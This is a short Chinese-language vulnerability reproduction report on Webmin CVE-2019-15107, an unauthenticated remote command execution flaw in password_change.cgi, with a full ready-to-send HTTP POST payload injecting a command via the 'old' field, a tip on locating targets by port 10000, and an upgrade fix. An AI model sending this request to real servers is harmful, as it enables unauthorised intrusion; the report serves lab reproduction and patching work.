Webmin远程命令执行漏洞复现报告

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1

Host: your-ip:10000

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Cookie: redirect=1; testing=1; sid=x; sessiontest=1

Referer: https://your-ip:10000/session_login.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

相关推荐
huaiyanchen6 小时前
chorme浏览器 您的连接不是私密连接
安全
安全方案9 小时前
政务安全运营核心能力模块
安全
aqymnkstkw10 小时前
2024年【电气试验】考试题库及电气试验模拟试题
大数据·c语言·人工智能·嵌入式硬件·安全
xiaojiesec10 小时前
第157天: 安全开发-Python 自动化挖掘项目&SRC 目标&FOFA 资产&Web 爬虫解析库
python·安全
亿林科技网络安全11 小时前
阿里云盘照片事件!网络安全警钟长鸣
网络·安全·web安全
玄客)11 小时前
MACCMS 远程命令执行漏洞复现(CVE-2017-17733)
学习·安全
HinsCoder12 小时前
【渗透测试】——Upload靶场实战(1-5关)
笔记·学习·安全·web安全·渗透测试·测试·upload靶场
newxtc12 小时前
【天怡AI-注册安全分析报告-无验证方式导致安全隐患】
人工智能·安全
网安康sir13 小时前
2024年三个月自学手册 网络安全(黑客技术)
网络·安全·web安全